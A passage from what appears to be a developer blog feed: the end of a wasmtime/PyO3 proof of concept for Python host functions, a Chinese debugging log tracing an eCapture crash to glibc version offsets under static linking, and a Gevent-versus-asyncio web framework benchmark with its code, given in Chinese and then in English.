            let mut linker = Linker::new(&engine);
            preview1::add_to_linker_sync(&mut linker, |t| t).unwrap();
            linker
                .func_wrap("demo", "demo", |a: i32, b: i32| {
                    (a+b)*10
                })
                .unwrap();
            linker.allow_unknown_exports(true);
            let mut builder = WasiCtxBuilder::new();
            builder.inherit_stdio();
            builder.env(
                "PYTHONPATH",
                "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug",
            );
            builder
                .preopened_dir(
                    "/workspaces/cpython-wasi",
                    "/",
                    wasmtime_wasi::DirPerms::all(),
                    wasmtime_wasi::FilePerms::all(),
                )
                .unwrap();
            builder.args(&["--", "-c", "import demo; print(demo.bar())"]);
            let wasi_ctx = builder.build_p1();
            let mut store = Store::new(&engine, wasi_ctx);
            let module = Module::from_file(
                &engine,
                "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm",
            )
            .unwrap();
            let instance = linker.instantiate(&mut store, &module).unwrap();
            let run = instance
                .get_typed_func::<(), ()>(&mut store, "_start")
                .unwrap();
            run.call(&mut store, ()).unwrap();
            return;
        }
        Err(e) => {
            println!("Error creating engine: {:?}", e);
            return;
        }
    }
}

Execute it, and we get the result:

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.79s
     Running `target/release/wasmtime-demo`
30

As expected.

Alright, now we support Host Functions, and we can modify our logic arbitrarily while adhering to the function signature. But do you remember the title of this article? We want to execute Python-implemented Host Functions. Hmm, although it’s a bit roundabout, it’s not impossible. Let’s directly bring out PyO3 and modify our Rust code as follows:

use pyo3::prelude::*;
use pyo3::types::PyTuple;
use wasmtime::*;
use wasmtime_wasi::preview1::{self};
use wasmtime_wasi::WasiCtxBuilder;
fn main() {
    let mut config = Config::new();
    config.max_wasm_stack(16777216);
    match Engine::new(&config) {
        Ok(engine) => {
            let mut linker = Linker::new(&engine);
            preview1::add_to_linker_sync(&mut linker, |t| t).unwrap();
            linker
                .func_wrap("demo", "demo", |a: i32, b: i32| {
                    Python::with_gil(|py| {
                        let fun: Py = PyModule::from_code_bound(
                            py,
                            "def example(*args, **kwargs):
                                return (args[0] + args[1])*11",
                            "",
                            "",
                        )
                        .unwrap()
                        .getattr("example")
                        .unwrap()
                        .into();
                        let args = PyTuple::new_bound(py, &[a, b]);
                        // cast following to int

                        fun.call1(py, args).unwrap().extract::<i32>(py).unwrap()
                    })
                })
                .unwrap();
            linker.allow_unknown_exports(true);
            let mut builder = WasiCtxBuilder::new();
            builder.inherit_stdio();
            builder.env(
                "PYTHONPATH",
                "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug",
            );
            builder
                .preopened_dir(
                    "/workspaces/cpython-wasi",
                    "/",
                    wasmtime_wasi::DirPerms::all(),
                    wasmtime_wasi::FilePerms::all(),
                )
                .unwrap();
            builder.args(&["--", "-c", "import demo; print(demo.bar())"]);
            let wasi_ctx = builder.build_p1();
            let mut store = Store::new(&engine, wasi_ctx);
            let module = Module::from_file(
                &engine,
                "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm",
            )
            .unwrap();
            let instance = linker.instantiate(&mut store, &module).unwrap();
            let run = instance
                .get_typed_func::<(), ()>(&mut store, "_start")
                .unwrap();
            run.call(&mut store, ()).unwrap();
            return;
        }
        Err(e) => {
            println!("Error creating engine: {:?}", e);
            return;
        }
    }
}

Then execute it, and we get the result:

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.75s
     Running `target/release/wasmtime-demo`
33

OK, we succeeded!

Summary

This article is actually a Proof of Concept (PoC) for a technical route, verifying the possibility of combining Python and WASI in specific situations. However, it also exposes some problems:

The lack of dlopen support requires modifying the CPython runtime code itself. However, according to information provided in Brett Cannon’s blog, someone has hacked this part of the code to provide support. It feels like we can follow up on this later.
The wasmtime Python binding is really difficult to use. We could consider wrapping it once based on PyO3.
Using Rust to handle wasmtime and PyO3 to call Python code currently has the problem that Python VM objects cannot be shared across threads. We might need to encapsulate a set of channels similar to Golang based on Rust to reuse the virtual machine and pass data.

However, overall, this PoC is still very interesting. I hope friends can also have fun playing with it.

References

[1]. https://bugs.python.org/issue40280

[2]. https://github.com/python/cpython/issues/116314

Debug 日志：eCapture GH-604

2024-09-18T14:00:00.000Z

Debug 日志系列第二篇，eCapture 的 GH-604，一个和 Go， Glibc，静态编译相关的问题

太长不看版：在 eCapture 中，由于在静态链接时 glibc 版本的差异，导致在 Ubuntu 下编译的二进制会在特定发行版上 Segment fault

开篇

首先介绍下 eCapture，这个项目是基于 eBPF 做的一套安全工具，核心的能力是可以提供在旁路对于 TLS 流量解密的能力

在8月25日的时候，社区反馈了一个 bug，编号 GH-604，其核心行为如下

下载在 GitHub Release 中发布的二进制，在 Arch Linux 下会 Segment Fault，报错大致如下

2024-09-18T21:10:47+08:00 INF BTF bytecode mode: CORE. btfMode=0
2024-09-18T21:10:47+08:00 INF module initialization. isReload=false moduleName=EBPFProbeOPENSSL
2024-09-18T21:10:47+08:00 INF Module.Run()
SIGSEGV: segmentation violation
PC=0x7f29ee844696 m=5 sigcode=1 addr=0x1e83c0
signal arrived during cgo execution

goroutine 19 gp=0xc0005b81c0 m=5 mp=0xc000100008 [syscall]:
runtime.cgocall(0x10990e0, 0xc0000bca90)
        /root/.go/src/runtime/cgocall.go:167 +0x4b fp=0xc0000bca58 sp=0xc0000bca20 pc=0x4739ab
net._C2func_getaddrinfo(0xc00058e3c0, 0x0, 0xc0005886f0, 0xc00058a0a0)
        _cgo_gotypes.go:108 +0x55 fp=0xc0000bca90 sp=0xc0000bca58 pc=0x84a7f5
net._C_getaddrinfo.func1(0xc00058e3c0, 0x0, 0xc0005886f0, 0xc00058a0a0)
        /root/.go/src/net/cgo_unix_cgo.go:78 +0xeb fp=0xc0000bcb48 sp=0xc0000bca90 pc=0x84af4b
net._C_getaddrinfo(0xc00058e3c0, 0x0, 0xc0005886f0, 0xc00058a0a0)
        /root/.go/src/net/cgo_unix_cgo.go:78 +0x6c fp=0xc0000bcbd0 sp=0xc0000bcb48 pc=0x84adac
net.cgoLookupHostIP({0x1351556, 0x3}, {0x13727d2, 0x9})
        /root/.go/src/net/cgo_unix.go:181 +0x3f9 fp=0xc0000bce38 sp=0xc0000bcbd0 pc=0x7f65b9
net.cgoLookupIP.func1()
        /root/.go/src/net/cgo_unix.go:226 +0x85 fp=0xc0000bcf00 sp=0xc0000bce38 pc=0x7f7145
net.doBlockingWithCtx[...].func1()
        /root/.go/src/net/cgo_unix.go:70 +0x8f fp=0xc0000bcfe0 sp=0xc0000bcf00 pc=0x84de4f
runtime.goexit({})
        /root/.go/src/runtime/asm_amd64.s:1700 +0x1 fp=0xc0000bcfe8 sp=0xc0000bcfe0 pc=0x482301
created by net.doBlockingWithCtx[...] in goroutine 18
        /root/.go/src/net/cgo_unix.go:67 +0x3c5

我在 Garuda 下能复现同样的问题，由于作者没有 Arch Linux 的环境，那么就由我来接手了

最开始的排查方向是先利用容器环境进行启动，发现执行正常。那么目前可以初步判断是依赖的二进制版本不同导致的问题，但是 eCapture 依赖的二进制有点多，那么怎么办呢？

这个时候 issue 的提出者提供了一个关键点，这个问题是 v0.8.1 之后出现的，那么很好办，祭出我们的 git bisect 大法

最后确定是 938fcffb95e23015af8643ae046c0e912de0a438 带来的问题，我们来看一下代码，这个代码核心的的变更在于

重构了一部分 Module 的注册逻辑
引入 Gin 框架来作为 HTTP Configuration 变更的框架

那么这里我们来调试一下，因为原本的二进制是 strip 了符号信息，我们先关闭符号信息，然后上 gdb ，获取崩溃时的栈信息，能得到如下信息

[Switching to LWP 1772723]
0x00007fffabe44696 in __ctype_init () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007fffabe44696 in __ctype_init () from /usr/lib/libc.so.6
#1  0x00007fffabf785d1 in __libc_early_init () from /usr/lib/libc.so.6
#2  0x000000000118729f in dl_open_worker_begin ()
#3  0x000000000113a7b8 in _dl_catch_exception ()
#4  0x0000000001186469 in dl_open_worker ()
#5  0x000000000113a7b8 in _dl_catch_exception ()
#6  0x000000000118681b in _dl_open ()
#7  0x000000000113a8f6 in do_dlopen ()
#8  0x000000000113a7b8 in _dl_catch_exception ()
#9  0x000000000113a883 in _dl_catch_error ()
#10 0x000000000113aa74 in __libc_dlopen_mode ()
#11 0x0000000001128eb5 in module_load ()
#12 0x0000000001129315 in __nss_module_get_function ()
#13 0x0000000001118fec in getaddrinfo ()
#14 0x0000000001099119 in _cgo_04fbb8f65a5f_C2func_getaddrinfo (v=0xc00013ca90) at cgo-gcc-prolog:60
#15 0x0000000000481f84 in runtime.asmcgocall () at /root/.go/src/runtime/asm_amd64.s:923
#16 0x000000c0001048c0 in ?? ()
#17 0x000000000048045a in runtime.morestack () at /root/.go/src/runtime/asm_amd64.s:621
#18 0x47681163f543b200 in ?? ()
#19 0x0100000000000016 in ?? ()
#20 0x0000000000800000 in net.(*sysDialer).dialSerial (sd=0x0, ctx=..., ras=..., ~r0=..., ~r1=...) at /root/.go/src/net/dial.go:630
#21 0x0000000000000000 in ?? ()

我们能看到 net.(*sysDialer).dialSerial 非常显眼，这个函数通常是在使用 net.Dialer ，进行 TCP 的监听时处理的，我们根据这一个信息，对比 code diff，便能确定，这一点是我们所引入 Gin 框架，执行 TCP 监听流程时遇到问题。

我们再往下看，我们能看到 getaddrinfo 这个函数，这个是执行 DNS Lookup 的痕迹。我们将代码中的 localhost:xx 更改为 IP 地址的形式，如同我们所预料的一样，问题消失了

那么我们可以判定，这个问题是 Golang 走 CGO 调用 getaddrinfo 时变量导致的问题

我们可以在开源社区的 Issue 中，查到之前的 Report，参见 https://github.com/golang/go/issues/30310，解决方法是可以避免使用 glibc 提供的 DNS lookup 而使用 Go 内置实现的 DNS 来处理。

在将项目代码构建参数新增 -tags 'netgo' 后，问题解决。

那么这个问题就到词结束了吗？并不是，我们的问题依然存在，到底是什么原因导致我们会出现使用 glibc 的时候有 Segment fault 的发生？

我们先把我们复现代码最小化

package main

import (
    "fmt"
    "net"
)

func main() {
    address := "localhost:8080"

    listener, err := net.Listen("tcp", address)
    if err != nil {
        fmt.Println("Error creating listener:", err)
        return
    }
    defer listener.Close()

    fmt.Printf("Listening on %s\n", address)

    for {
        conn, err := listener.Accept()
        if err != nil {
            fmt.Println("Error accepting connection:", err)
            continue
        }

        go handleConnection(conn)
    }
}

func handleConnection(conn net.Conn) {
    defer conn.Close()

    buffer := make([]byte, 1024)
    n, err := conn.Read(buffer)
    if err != nil {
        fmt.Println("Error reading from connection:", err)
        return
    }

    fmt.Printf("Received: %s\n", string(buffer[:n]))

    response := "Hello, client!"
    _, err = conn.Write([]byte(response))
    if err != nil {
        fmt.Println("Error writing to connection:", err)
        return
    }
}

我们先使用，CGO_ENABLED=1 go build 来构建复现代码，然后发现，可以在不同环境下运行。而当我们使用 CGO_ENABLED=1 go build -ldflags "-linkmode=external -extldflags -static" 的参数构建的产物则不可以。为什么呢？我们来对比下汇编

我们能发现在第一种参数构建的代码，其 getaddrinfo 的部分如下

00000000004022a0 :
  4022a0:ff 25 aa 3e 1e 00    jmp    *0x1e3eaa(%rip)        # 5e6150 
  4022a6:68 27 00 00 00       push   $0x27
  4022ab:e9 70 fd ff ff       jmp    402020 <_init+0x20>

哦，熟悉的 PLT 的部分，这一部分是纯动态链接，直接在加载时由链接器来处理。而第二种方式构建的的产物却不一样

0000000000528fd0 :
  528fd0:f3 0f 1e fa          endbr64
  528fd4:55                   push   %rbp
  528fd5:48 89 e5             mov    %rsp,%rbp
  528fd8:41 57                push   %r15
  528fda:49 89 d7             mov    %rdx,%r15
  528fdd:41 56                push   %r14
  528fdf:41 55                push   %r13
  528fe1:41 54                push   %r12
  528fe3:49 89 f4             mov    %rsi,%r12
  528fe6:53                   push   %rbx
  528fe7:48 81 ec 38 07 00 00 sub    $0x738,%rsp
  528fee:48 89 bd 18 f9 ff ff mov    %rdi,-0x6e8(%rbp)
  528ff5:48 89 8d b0 f8 ff ff mov    %rcx,-0x750(%rbp)
  528ffc:64 48 8b 04 25 28 00 mov    %fs:0x28,%rax
  529003:00 00 
  529005:48 89 45 c8          mov    %rax,-0x38(%rbp)
  529009:31 c0                xor    %eax,%eax
  52900b:48 c7 85 30 f9 ff ff movq   $0x0,-0x6d0(%rbp)
  529012:00 00 00 00 
  529016:48 85 ff             test   %rdi,%rdi
  529019:0f 84 3a 08 00 00    je     529859 
  52901f:80 3f 2a             cmpb   $0x2a,(%rdi)
  529022:0f 84 27 08 00 00    je     52984f 
  529028:4d 85 e4             test   %r12,%r12
  52902b:74 0b                je     529038 
  52902d:41 80 3c 24 2a       cmpb   $0x2a,(%r12)
  529032:0f 84 7c 0b 00 00    je     529bb4 
  529038:4d 85 ff             test   %r15,%r15
  52903b:0f 84 4f 08 00 00    je     529890 
  529041:41 8b 07             mov    (%r15),%eax
  529044:a9 00 f8 ff ff       test   $0xfffff800,%eax
  529049:0f 85 6d 19 00 00    jne    52a9bc 
  52904f:48 83 bd 18 f9 ff ff cmpq   $0x0,-0x6e8(%rbp)

这里省略了很多的汇编，我们可以结合 GDB 的调试来看一下关键信息

#0  0x00007fffb0044696 in __GI___ctype_init () at ctype-info.c:31
#1  0x00007fffb01785d1 in __libc_early_init (initial=false) at libc_early_init.c:35
#2  0x000000000059549f in dl_open_worker_begin ()
#3  0x000000000054a5e8 in _dl_catch_exception ()
#4  0x0000000000594669 in dl_open_worker ()
#5  0x000000000054a5e8 in _dl_catch_exception ()
#6  0x0000000000594a1b in _dl_open ()
#7  0x000000000054a726 in do_dlopen ()
#8  0x000000000054a5e8 in _dl_catch_exception ()
#9  0x000000000054a6b3 in _dl_catch_error ()
#10 0x000000000054a8a4 in __libc_dlopen_mode ()
#11 0x0000000000538ce5 in module_load ()
#12 0x0000000000539145 in __nss_module_get_function ()
#13 0x000000000052aa3c in getaddrinfo ()
#14 0x00000000004da549 in _cgo_04fbb8f65a5f_C2func_getaddrinfo (v=0xc0001acdd0) at /tmp/go-build/cgo-gcc-prolog:60
#15 0x0000000000471204 in runtime.asmcgocall () at /root/.go/src/runtime/asm_amd64.s:923
#16 0x000000c0001868c0 in ?? ()

我们能看到第二种方式（即使用外部链接器，以静态链接方式进行链接）的背后是会用 dl_open 去处理 glibc 的链接

我们直接跳转到 __ctype_init 看下源码以及汇编，这里第一段汇编是在 Glibc 2.35 下编译产物，第二段是在 Arch Linux 下的 Glibc 2.40 下编译的产物

void
__ctype_init (void)
{
  const uint16_t **bp = __libc_tsd_address (const uint16_t *, CTYPE_B);
  *bp = (const uint16_t *) _NL_CURRENT (LC_CTYPE, _NL_CTYPE_CLASS) + 128;
  const int32_t **up = __libc_tsd_address (const int32_t *, CTYPE_TOUPPER);
  *up = ((int32_t *) _NL_CURRENT (LC_CTYPE, _NL_CTYPE_TOUPPER) + 128);
  const int32_t **lp = __libc_tsd_address (const int32_t *, CTYPE_TOLOWER);
  *lp = ((int32_t *) _NL_CURRENT (LC_CTYPE, _NL_CTYPE_TOLOWER) + 128);
}

000000000055aee0 <__ctype_init>:
  55aee0:f3 0f 1e fa          endbr64
  55aee4:48 c7 c0 80 ff ff ff mov    $0xffffffffffffff80,%rax
  55aeeb:48 c7 c1 f0 ff ff ff mov    $0xfffffffffffffff0,%rcx
  55aef2:64 48 8b 00          mov    %fs:(%rax),%rax
  55aef6:48 8b 00             mov    (%rax),%rax
  55aef9:48 8b 70 40          mov    0x40(%rax),%rsi
  55aefd:48 8d 96 00 01 00 00 lea    0x100(%rsi),%rdx
  55af04:64 48 89 11          mov    %rdx,%fs:(%rcx)
  55af08:48 8b 78 48          mov    0x48(%rax),%rdi
  55af0c:48 c7 c1 e8 ff ff ff mov    $0xffffffffffffffe8,%rcx
  55af13:48 8d 97 00 02 00 00 lea    0x200(%rdi),%rdx
  55af1a:64 48 89 11          mov    %rdx,%fs:(%rcx)
  55af1e:48 8b 40 58          mov    0x58(%rax),%rax
  55af22:48 c7 c2 e0 ff ff ff mov    $0xffffffffffffffe0,%rdx
  55af29:48 05 00 02 00 00    add    $0x200,%rax
  55af2f:64 48 89 02          mov    %rax,%fs:(%rdx)
  55af33:c3                   ret
  55af34:66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
  55af3b:00 00 00 
  55af3e:66 90                xchg   %ax,%ax

第二段

000000000111c270 <__ctype_init>:
 111c270:f3 0f 1e fa          endbr64
 111c274:48 c7 c0 90 ff ff ff mov    $0xffffffffffffff90,%rax
 111c27b:48 c7 c1 e8 ff ff ff mov    $0xffffffffffffffe8,%rcx
 111c282:64 48 8b 00          mov    %fs:(%rax),%rax
 111c286:48 8b 00             mov    (%rax),%rax
 111c289:48 8b 70 38          mov    0x38(%rax),%rsi
 111c28d:48 8d 96 00 01 00 00 lea    0x100(%rsi),%rdx
 111c294:64 48 89 11          mov    %rdx,%fs:(%rcx)
 111c298:48 8b 78 40          mov    0x40(%rax),%rdi
 111c29c:48 c7 c1 e0 ff ff ff mov    $0xffffffffffffffe0,%rcx
 111c2a3:48 8d 97 00 02 00 00 lea    0x200(%rdi),%rdx
 111c2aa:64 48 89 11          mov    %rdx,%fs:(%rcx)
 111c2ae:48 8b 40 50          mov    0x50(%rax),%rax
 111c2b2:48 c7 c2 d8 ff ff ff mov    $0xffffffffffffffd8,%rdx
 111c2b9:48 05 00 02 00 00    add    $0x200,%rax
 111c2bf:64 48 89 02          mov    %rax,%fs:(%rdx)
 111c2c3:c3                   ret
 111c2c4:66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
 111c2cb:00 00 00 
 111c2ce:66 90                xchg   %ax,%ax

我们能看到两段代码行为基本一致，但是 offset 存在明显差异。这个时候我们对比一下 Glibc 两个版本的代码的差异

我们能发现，由于 __locale_data 结构的变化，导致 _NL_CTYPE_CLASS 的 offset 在不同版本下存在偏移

//v2.35

struct __locale_data
{
  const char *name;
  const char *filedata;/* Region mapping the file data.  */
  off_t filesize;/* Size of the file (and the region).  */
  enum/* Flavor of storage used for those.  */
  {
    ld_malloced,/* Both are malloc'd.  */
    ld_mapped,/* name is malloc'd, filedata mmap'd */
    ld_archive/* Both point into mmap'd archive regions.  */
  } alloc;

  /* This provides a slot for category-specific code to cache data computed
     about this locale.  That code can set a cleanup function to deallocate
     the data.  */
  struct
  {
    void (*cleanup) (struct __locale_data *);
    union
    {
      void *data;
      struct lc_time_data *time;
      const struct gconv_fcts *ctype;
    };
  } private;

  unsigned int usage_count;/* Counter for users.  */

  int use_translit;/* Nonzero if the mb*towv*() and wc*tomb()
   functions should use transliteration.  */

  unsigned int nstrings;/* Number of strings below.  */
  union locale_data_value
  {
    const uint32_t *wstr;
    const char *string;
    unsigned int word;/* Note endian issues vs 64-bit pointers.  */
  }
  values __flexarr;/* Items, usually pointers into `filedata'.  */
};

//v2.40

struct __locale_data
{
  const char *name;
  const char *filedata;/* Region mapping the file data.  */
  off_t filesize;/* Size of the file (and the region).  */
  enum/* Flavor of storage used for those.  */
  {
    ld_malloced,/* Both are malloc'd.  */
    ld_mapped,/* name is malloc'd, filedata mmap'd */
    ld_archive/* Both point into mmap'd archive regions.  */
  } alloc;

  /* This provides a slot for category-specific code to cache data
     computed about this locale.  Type of the data pointed to:

     LC_CTYPE   struct lc_ctype_data (_nl_intern_locale_data)
     LC_TIME    struct lc_time_data (_nl_init_alt_digit, _nl_init_era_entries)

     This data deallocated at the start of _nl_unload_locale.  */
  void *private;

  unsigned int usage_count;/* Counter for users.  */

  int use_translit;/* Nonzero if the mb*towv*() and wc*tomb()
   functions should use transliteration.  */

  unsigned int nstrings;/* Number of strings below.  */
  union locale_data_value
  {
    const uint32_t *wstr;
    const char *string;
    unsigned int word;/* Note endian issues vs 64-bit pointers.  */
  }
  values __flexarr;/* Items, usually pointers into `filedata'.  */
};

那么我们问题的 Root cause 也就得到了确定，整个问题的因果链如下

我们项目使用引入 Gin，来作为 HTTP Server
我们使用 localhost 来作为默认的监听地址
localhost 在服务端启动监听的时候触发了 DNS Lookup 行为
CGO_ENABLED=1 的情况下，Golang 默认使用 glibc 中的 getaddrinfo 进行 DNS lookup
我们项目开启了 -ldflags "-linkmode=external -extldflags -static"，即使用外部链接器，以静态链接方式进行链接），将会使用 dl_open 来处理 glibc，而且这种情况下，__ctype_init 这类方法将会被静态编译至二进制中
Glibc 中特定字段不同版本的 offset 不一致
结合 4&5&6, 我们在 Glibc 2.35 （即文中默认的构建机）静态编译后的产物，因为 offset 不一致，在 Glibc 2.40 （即 Arch Linux）下使用时，会出现 segment fault

问题得证

总结

这个问题变更只有一行，但是查了我很久的时间，反复在 Go 和 Glibc 的源码中横跳。顺便还去复习了 Linker 的很多知识

这某种意义上是我很喜欢这个行业的原因，因为我们所遇到的每个问题背后的风景，都很值得一看。

2024 年了，是 Gevent 还是选择 asyncio Part 1？

2024-08-19T17:00:00.000Z

Gevent 还是 asyncio 这一直是个经典的问题，在这里我们直接用数据来帮助大家做一下决策

开篇

Lin Wei 老师珠玉在前

给出了 asyncio 和 Gevnet 的极限性能。在这里我们看到了 asyncio 配合 uvloop 基本上是 Gevent 的 double 了

那么在在 Web 框架下是否如此呢？

我们来做一下实验吧

首先说一下负载机器的配置，这里我选用了 Azure 上 D8as_v5 的机器，该机器配置如下：

8Core32G 的配置
底座硬件基于 EPYC 7763 系列处理器
共计4个节点，分配给 Django/Flast/FastAPI/Starlette 四个不同的框架

我们压测框架选择 locust，同样基于 Kuberntes 集群，因为我账户的 D8as_v5 机器的 Quota 不太够，所以压测框架我们选了不同机器的混合部署

4个 D8as_v5，共计 32 Core 算力
4个 D8as_v3，共计 32 Core 算力
4个 D4as_v2，共计 16 Core 算力

我们测试的主要目的是模拟在生产环境下的吞吐，所以我选择的测试方式如下

准备一台 16Core 64G 的 MySQL 实例，用于存储数据
创建一张表，随机写入100万数据
在框架代码中进行 SQL 查询，返回查询结果

MySQL 表结构如下

create table  if not exists  `demo_data`
(
    `id`          bigint(20)   not null auto_increment,
    `name`        varchar(255) not null,
    `create_time` timestamp default CURRENT_TIMESTAMP,
    `update_time` timestamp default CURRENT_TIMESTAMP,
    primary key (`id`),
    index (`name`)
) charset = utf8mb4
  engine = innodb;

Django 代码如下

import random

from django.core import serializers
from django.shortcuts import HttpResponse

from .models import DemoData

TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


# Create your views here.
def demo_views(request):
    result = DemoData.objects.filter(
        name="".join(random.choices(TEMP, k=random.randrange(1, 254)))
    )
    # x = json.dumps(request.body)
    return HttpResponse(
        serializers.serialize("json", result if result else []),
        content_type="application/json",
    )

Flask 代码如下

import json
import random

import os
import dataset
from flask import Flask, Response

app = Flask(__name__)

DATABASE_URL = f"mysql://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"
db = dataset.connect(DATABASE_URL, engine_kwargs={"pool_size": 10000})

TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


@app.route("/demo", methods=["GET"])
def demo_code():
    return Response(
        response=json.dumps(
            list(
                db.query(
                    f"select * from demo_data where name='{''.join(random.choices(TEMP, k=random.randrange(1, 254)))}'"
                )
            ),
            default=str
        ),
        status=200,
        content_type="application/json",
    )


if __name__ == "__main__":
    app.run(debug=True)

FastAPI 代码如下

import random
import os
from typing import List

import databases
import pymysql
import sqlalchemy
import json
from fastapi import FastAPI
from fastapi.responses import Response
from pydantic import BaseModel

pymysql.install_as_MySQLdb()

AYSNC_DATABASE_URL = f"mysql+aiomysql://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"
SYNC_DATABASE_URL = f"mysql+mysqldb://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"

database = databases.Database(AYSNC_DATABASE_URL, max_size=10000)

metadata = sqlalchemy.MetaData()

demo_data = sqlalchemy.Table(
    "demo_data",
    metadata,
    sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
    sqlalchemy.Column("name", sqlalchemy.String),
    sqlalchemy.Column("create_time", sqlalchemy.DATETIME),
    sqlalchemy.Column("update_time", sqlalchemy.DATETIME),
)
engine = sqlalchemy.create_engine(SYNC_DATABASE_URL)
metadata.create_all(engine)
TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


class DemoData(BaseModel):
    id: int
    name: str


app = FastAPI()

init = False


@app.get("/demo", response_model=List[DemoData])
async def demo_code():
    global init
    if not init:
        await database.connect()
        init = True

    query = demo_data.select().where(
        demo_data.c.name == "".join(random.choices(TEMP, k=random.randrange(1, 254)))
    )
    data = await database.fetch_all(query)
    response = json.dumps(data, default=str)
    return Response(content=response, status_code=200, media_type="application/json")

Starlette 代码如下

import random
import os
from typing import List

import databases
import pymysql
import json
import sqlalchemy
from starlette.applications import Starlette
from starlette.responses import Response
from starlette.routing import Route
from pydantic import BaseModel

pymysql.install_as_MySQLdb()

AYSNC_DATABASE_URL = f"mysql+aiomysql://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"
SYNC_DATABASE_URL = f"mysql+mysqldb://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"

database = databases.Database(AYSNC_DATABASE_URL, max_size=10000)

metadata = sqlalchemy.MetaData()

demo_data = sqlalchemy.Table(
    "demo_data",
    metadata,
    sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
    sqlalchemy.Column("name", sqlalchemy.String),
    sqlalchemy.Column("create_time", sqlalchemy.DATETIME),
    sqlalchemy.Column("update_time", sqlalchemy.DATETIME),
)
engine = sqlalchemy.create_engine(SYNC_DATABASE_URL)
metadata.create_all(engine)
TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


class DemoData(BaseModel):
    id: int
    name: str


init = False


async def demo_code(request):
    global init
    if not init:
        await database.connect()
        init = True

    query = demo_data.select().where(
        demo_data.c.name == "".join(random.choices(TEMP, k=random.randrange(1, 254)))
    )
    data = await database.fetch_all(query)
    return Response(content=json.dumps(data, default=str), status_code=200, media_type="application/json")

routes = [
    Route("/demo", demo_code, methods=["GET"]),
]

app = Starlette(debug=False, routes=routes)

然后部署方式如下

各服务都部署在 K8S 上，POD 类型为 Guaranteed
所有镜像都基于 3.12 构建
服务限制 6Core 的 CPU
Django 和 Flask 基于 Gevent + Gunicorn 进行部署，利用 Greenify 对二进制进行 Patch
FastAPI 和 Starlette 基于 uvicorn 进行部署，使用 uvloop 作为 event loop

OK，我们现在来公布测试结果

标准操作下的测试结果

Django:

FastAPI

Flask

Starlette

Django 毫无疑问的最后，其余三者的性能是 Flask + Gevent > Starlette > FastAPI，后三个框架 CPU 占用率均 > 90%

空转测试

为了保险起见，我们将后续三个框架进行空转测试

Flask

FastAPI

Starlette

Starlette > FastAPI > Flask + Gevent

总结

目前来看，整体结论是这样

在空转情况下，asyncio 的性能要搞出 Gevent 不少，加上框架因素后，也有百分之10-20% 的提升
在 ORM + MySQL Driver 的情况下，Gevent 的生态要好于 asyncio 的生态

如果换成 ORM + PGSQL 的生态结论会不会更好一些呢？有点期待下一轮测试的结果

In 2024, Gevent or asyncio? Part 1

2024-08-19T17:00:00.000Z

The choice between Gevent and asyncio has always been a classic question. Here, we’ll use data to help you make a decision.

Introduction

Professor Lin Wei has set a high standard:

This graph shows the extreme performance of asyncio and Gevent. We can see that asyncio with uvloop is basically double the performance of Gevent.

But is this the case under web frameworks?

Let’s conduct an experiment.

First, let’s talk about the configuration of the load machine. I chose a D8as_v5 machine on Azure with the following configuration:

8 Core 32GB configuration
The underlying hardware is based on the EPYC 7763 series processor
A total of 4 nodes, allocated to Django/Flask/FastAPI/Starlette, four different frameworks

We chose locust as our load testing framework, also based on a Kubernetes cluster. Because the quota for D8as_v5 machines in my account wasn’t sufficient, we chose a mixed deployment of different machines for the load testing framework:

4 D8as_v5, totaling 32 Core computing power
4 D8as_v3, totaling 32 Core computing power
4 D4as_v2, totaling 16 Core computing power

Our main purpose for testing is to simulate throughput in a production environment, so I chose the following test method:

Prepare a 16 Core 64GB MySQL instance for data storage
Create a table and randomly write 1 million data entries
Perform SQL queries in the framework code and return the query results

The MySQL table structure is as follows:

create table if not exists `demo_data`
(
    `id`          bigint(20)   not null auto_increment,
    `name`        varchar(255) not null,
    `create_time` timestamp default CURRENT_TIMESTAMP,
    `update_time` timestamp default CURRENT_TIMESTAMP,
    primary key (`id`),
    index (`name`)
) charset = utf8mb4
  engine = innodb;

Django code is as follows:

import random

from django.core import serializers
from django.shortcuts import HttpResponse

from .models import DemoData

TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


# Create your views here.
def demo_views(request):
    result = DemoData.objects.filter(
        name="".join(random.choices(TEMP, k=random.randrange(1, 254)))
    )
    # x = json.dumps(request.body)
    return HttpResponse(
        serializers.serialize("json", result if result else []),
        content_type="application/json",
    )

Flask code is as follows:

import json
import random

import os
import dataset
from flask import Flask, Response

app = Flask(__name__)

